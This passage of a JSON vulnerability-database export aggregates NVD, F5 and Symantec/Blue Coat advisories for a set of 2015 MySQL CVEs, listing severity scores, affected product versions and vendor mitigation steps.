"NONE", "availabilityImpact": 
"PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4815"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4815", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4815", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2017-07-06T10:21:41", "bulletinFamily": "software", "cvelist": ["CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", 
"CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4864", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4800", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4833", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826", "CVE-2015-4862", "CVE-2015-4890"], "edition": 1, "description": "\nF5 Product Development has assigned ID 502493 (BIG-IP) and ID 556684 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H59010802 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP AAM| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.0| None| Medium| MySQL \nBIG-IP AFM| 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.0| None| Medium| MySQL \nBIG-IP Analytics| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.0| None| Medium| MySQL \nBIG-IP APM| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP ASM| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP DNS| 13.0.0 \n12.0.0 - 12.1.2| None| Medium| MySQL \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP GTM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP Link Controller| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP PEM| 13.0.0 \n12.0.0 - 12.1.2 
\n11.3.0 - 11.6.0| None| Medium| MySQL \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Medium| MySQL \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability for BIG-IP and Enterprise Manager systems, you should permit management access to F5 products only over a secure network, and limit shell access to only trusted users. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>). \n \nAdditionally, for Enterprise Manager, you should avoid enabling the Remote Access feature to provide remote access to the statistical database. 
If you have the Remote Access feature enabled, you should disable it by performing the following procedure: \n \n**Disabling the Remote Access feature** \n \n**Impact of action**: You will no longer be allowed to remotely access the MySQL statistical database.\n\n 1. Log in to the Enterprise Manager Configuration utility.\n 2. Click **Enterprise Management**.\n 3. Navigate to **Options** > **Statistics** > **Remote Access**.\n 4. Clear the **Allow Remote Access** check box.\n 5. Click **Save Changes**.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n", "modified": "2017-07-06T08:33:00", "published": "2015-12-16T02:17:00", "href": "https://support.f5.com/csp/article/K59010802", "id": "F5:K59010802", "title": "Multiple MySQL vulnerabilities", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:09:45", "bulletinFamily": "software", "cvelist": ["CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4864", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4800", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4833", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826", "CVE-2015-4862", "CVE-2015-4890"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this 
vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability for BIG-IP and Enterprise Manager systems, you should permit management access to F5 products only over a secure network and limit shell access to only trusted users. For more information, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x) and SOL13092: Overview of securing access to the BIG-IP system. \n \nAdditionally, for Enterprise Manager, you should avoid enabling the Remote Access feature to provide remote access to the statistical database. If you have the Remote Access feature enabled, you should disable it by performing the following procedure: \n \n**Disabling the Remote Access feature** \n \n**Impact of action**: You will no longer be allowed to remotely access the MySQL statistical database.\n\n 1. Log in to the Enterprise Manager Configuration utility.\n 2. Click **Enterprise Management**.\n 3. Navigate to **Options** > **Statistics** > **Remote Access**.\n 4. Clear the **Allow Remote Access** check box.\n 5. 
Click **Save Changes**.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2015-12-15T00:00:00", "published": "2015-12-15T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/59/sol59010802.html", "id": "SOL59010802", "title": "SOL59010802 - Multiple MySQL vulnerabilities", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T00:16:32", "bulletinFamily": "software", "cvelist": ["CVE-2015-4791", "CVE-2015-4904", "CVE-2015-4807", "CVE-2015-4766"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 \n11.4.0 - 11.6.0| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 \n11.0.0 - 11.6.0| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP 
Link Controller| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2016-01-09T02:32:00", "published": "2015-12-04T00:30:00", "href": "https://support.f5.com/csp/article/K86326526", "id": "F5:K86326526", "title": "MySQL vulnerabilities CVE-2015-4766, CVE-2015-4904, CVE-2015-4791, and CVE-2015-4807", "type": "f5", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-03-19T09:02:00", "bulletinFamily": "software", 
"cvelist": ["CVE-2015-4791", "CVE-2015-4904", "CVE-2015-4807", "CVE-2015-4766"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2015-12-03T00:00:00", "published": "2015-12-03T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/86/sol86326526.html", "id": "SOL86326526", "title": "SOL86326526 - MySQL vulnerabilities CVE-2015-4766, CVE-2015-4904, CVE-2015-4791, and CVE-2015-4807", "type": "f5", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}], "symantec": [{"lastseen": "2020-12-24T10:41:52", "bulletinFamily": "software", "cvelist": ["CVE-2015-4730", "CVE-2015-4766", "CVE-2015-4791", "CVE-2015-4792", "CVE-2015-4800", "CVE-2015-4802", "CVE-2015-4807", "CVE-2015-4815", "CVE-2015-4816", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4833", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4862", "CVE-2015-4864", "CVE-2015-4866", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4890", "CVE-2015-4895", "CVE-2015-4904", "CVE-2015-4905", "CVE-2015-4910", "CVE-2015-4913"], "description": "### SUMMARY\n\nBlue Coat products using affected versions of MySQL 5.5 and 5.6 are susceptible to multiple vulnerabilities. An attacker can exploit these vulnerabilities to execute arbitrary code and gain unauthorized read, insert, update, or delete access to subsets of MySQL Server accessible data. 
The attacker can also cause denial of service through application crashes.\n\n### AFFECTED PRODUCTS\n\n**Malware Analysis Appliance** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2015-4792, CVE-2015-4800, \nCVE-2015-4802, CVE-2015-4815, \nCVE-2015-4816, CVE-2015-4819, \nCVE-2015-4826, CVE-2015-4830, \nCVE-2015-4836, CVE-2015-4858, \nCVE-2015-4861, CVE-2015-4864, \nCVE-2015-4870, CVE-2015-4879, \nCVE-2015-4913 | 4.2 | Upgrade to 4.2.8. \n \n### \n\n### ADDITIONAL PRODUCT INFORMATION\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP.\n\nThe following products are not vulnerable: \n**Advanced Secure Gateway \nAndroid Mobile Agent \nAuthConnector \nBCAAA \nBlue Coat HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nContent Analysis System \nDirector \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nMail Threat Defense \nManagement Center \nNorman Shark Industrial Control System Protection \nNorman Shark Network Protection \nNorman Shark SCADA Protection \nPacketShaper \nPacketShaper S-Series \nPolicyCenter \nPolicyCenter S-Series \nProxyClient \nProxyAV \nProxyAV ConLog and ConLogXP \nProxySG \nReporter \nSecurity Analytics \nSSL Visibility \nUnified Agent \nX-Series XOS**\n\n### ISSUES\n\n**CVE-2015-4730** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77199](<https://www.securityfocus.com/bid/77199>) / NVD: [CVE-2015-4730](<https://nvd.nist.gov/vuln/detail/CVE-2015-4730>) \n**Impact** | Denial of service 
\n**Description** | A flaw in the Server: Types sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4766** \n--- \n**Severity / CVSSv2** | Low / 1.9 (AV:L/AC:M/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77232](<https://www.securityfocus.com/bid/77232>) / NVD: [CVE-2015-4766](<https://nvd.nist.gov/vuln/detail/CVE-2015-4766>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Security: Firewall sub-component allows a local attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4791** \n--- \n**Severity / CVSSv2** | Low / 3.5 (AV:N/AC:M/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77213](<https://www.securityfocus.com/bid/77213>) / NVD: [CVE-2015-4791](<https://nvd.nist.gov/vuln/detail/CVE-2015-4791>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Security: Privileges sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4792** \n--- \n**Severity / CVSSv2** | Low / 1.7 (AV:N/AC:H/Au:M/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77171](<https://www.securityfocus.com/bid/77171>) / NVD: [CVE-2015-4792](<https://nvd.nist.gov/vuln/detail/CVE-2015-4792>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Partition sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. 
\n \n \n\n**CVE-2015-4800** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77216](<https://www.securityfocus.com/bid/77216>) / NVD: [CVE-2015-4800](<https://nvd.nist.gov/vuln/detail/CVE-2015-4800>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Optimizer sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4802** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77165](<https://www.securityfocus.com/bid/77165>) / NVD: [CVE-2015-4802](<https://nvd.nist.gov/vuln/detail/CVE-2015-4802>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Partition sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4807** \n--- \n**Severity / CVSSv2** | Low / 3.5 (AV:N/AC:M/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77205](<https://www.securityfocus.com/bid/77205>) / NVD: [CVE-2015-4807](<https://nvd.nist.gov/vuln/detail/CVE-2015-4807>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Query Cache sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4815** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77222](<https://www.securityfocus.com/bid/77222>) / NVD: [CVE-2015-4815](<https://nvd.nist.gov/vuln/detail/CVE-2015-4815>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: DDL sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. 
\n \n \n\n**CVE-2015-4816** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77134](<https://www.securityfocus.com/bid/77134>) / NVD: [CVE-2015-4816](<https://nvd.nist.gov/vuln/detail/CVE-2015-4816>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: InnoDB sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4819** \n--- \n**Severity / CVSSv2** | High / 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C) \n**References** | SecurityFocus: [BID 77196](<https://www.securityfocus.com/bid/77196>) / NVD: [CVE-2015-4819](<https://nvd.nist.gov/vuln/detail/CVE-2015-4819>) \n**Impact** | Code execution \n**Description** | A flaw in the Client programs sub-component allows a local attacker to execute arbitrary code. \n \n \n\n**CVE-2015-4826** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N) \n**References** | SecurityFocus: [BID 77237](<https://www.securityfocus.com/bid/77237>) / NVD: [CVE-2015-4826](<https://nvd.nist.gov/vuln/detail/CVE-2015-4826>) \n**Impact** | Information disclosure \n**Description** | A flaw in the Server: Types sub-component allows a remote authenticated attacker to gain unauthorized read access to a subset of data. \n \n \n\n**CVE-2015-4830** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N) \n**References** | SecurityFocus: [BID 77228](<https://www.securityfocus.com/bid/77228>) / NVD: [CVE-2015-4830](<https://nvd.nist.gov/vuln/detail/CVE-2015-4830>) \n**Impact** | Unauthorized modification of data \n**Description** | A flaw in the Server: Security: Privileges sub-component allows a remote authenticated attacker to gain unauthorized update, insert, or delete access to a subset of data. 
\n \n \n\n**CVE-2015-4833** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77170](<https://www.securityfocus.com/bid/77170>) / NVD: [CVE-2015-4833](<https://nvd.nist.gov/vuln/detail/CVE-2015-4833>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Partition sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4836** \n--- \n**Severity / CVSSv2** | Low / 2.8 (AV:N/AC:M/Au:M/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77190](<https://www.securityfocus.com/bid/77190>) / NVD: [CVE-2015-4836](<https://nvd.nist.gov/vuln/detail/CVE-2015-4836>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: SP sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4858** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77145](<https://www.securityfocus.com/bid/77145>) / NVD: [CVE-2015-4858](<https://nvd.nist.gov/vuln/detail/CVE-2015-4858>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: DML sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4861** \n--- \n**Severity / CVSSv2** | Low / 3.5 (AV:N/AC:M/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77137](<https://www.securityfocus.com/bid/77137>) / NVD: [CVE-2015-4861](<https://nvd.nist.gov/vuln/detail/CVE-2015-4861>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: InnoDB sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. 
\n \n \n\n**CVE-2015-4862** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77147](<https://www.securityfocus.com/bid/77147>) / NVD: [CVE-2015-4862](<https://nvd.nist.gov/vuln/detail/CVE-2015-4862>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: DML sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4864** \n--- \n**Severity / CVSSv2** | Low / 3.5 (AV:N/AC:M/Au:S/C:N/I:P/A:N) \n**References** | SecurityFocus: [BID 77187](<https://www.securityfocus.com/bid/77187>) / NVD: [CVE-2015-4864](<https://nvd.nist.gov/vuln/detail/CVE-2015-4864>) \n**Impact** | Unauthorized modification of data \n**Description** | A flaw in the Server: Security: Privileges sub-component allows a remote authenticated attacker to gain unauthorized update, insert, or delete access to a subset of data. \n \n \n\n**CVE-2015-4866** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77132](<https://www.securityfocus.com/bid/77132>) / NVD: [CVE-2015-4866](<https://nvd.nist.gov/vuln/detail/CVE-2015-4866>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: InnoDB sub-component allows a remote authenticated attacker to cause the server to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4870** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77208](<https://www.securityfocus.com/bid/77208>) / NVD: [CVE-2015-4870](<https://nvd.nist.gov/vuln/detail/CVE-2015-4870>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Parser sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. 
\n \n \n\n**CVE-2015-4879** \n--- \n**Severity / CVSSv2** | Medium / 4.6 (AV:N/AC:H/Au:S/C:P/I:P/A:P) \n**References** | SecurityFocus: [BID 77140](<https://www.securityfocus.com/bid/77140>) / NVD: [CVE-2015-4879](<https://nvd.nist.gov/vuln/detail/CVE-2015-4879>) \n**Impact** | Code execution \n**Description** | A flaw in the Server: DML sub-component allows a remote authenticated attacker to take over MySQL Server and possibly execute arbitrary code. \n \n \n\n**CVE-2015-4890** \n--- \n**Severity / CVSSv2** | Low / 3.5 (AV:N/AC:M/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77231](<https://www.securityfocus.com/bid/77231>) / NVD: [CVE-2015-4890](<https://nvd.nist.gov/vuln/detail/CVE-2015-4890>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Replication sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4895** \n--- \n**Severity / CVSSv2** | Low / 3.5 (AV:N/AC:M/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77136](<https://www.securityfocus.com/bid/77136>) / NVD: [CVE-2015-4895](<https://nvd.nist.gov/vuln/detail/CVE-2015-4895>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: InnoDB sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4904** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77219](<https://www.securityfocus.com/bid/77219>) / NVD: [CVE-2015-4904](<https://nvd.nist.gov/vuln/detail/CVE-2015-4904>) \n**Impact** | Denial of service \n**Description** | A flaw in the libmysqld sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. 
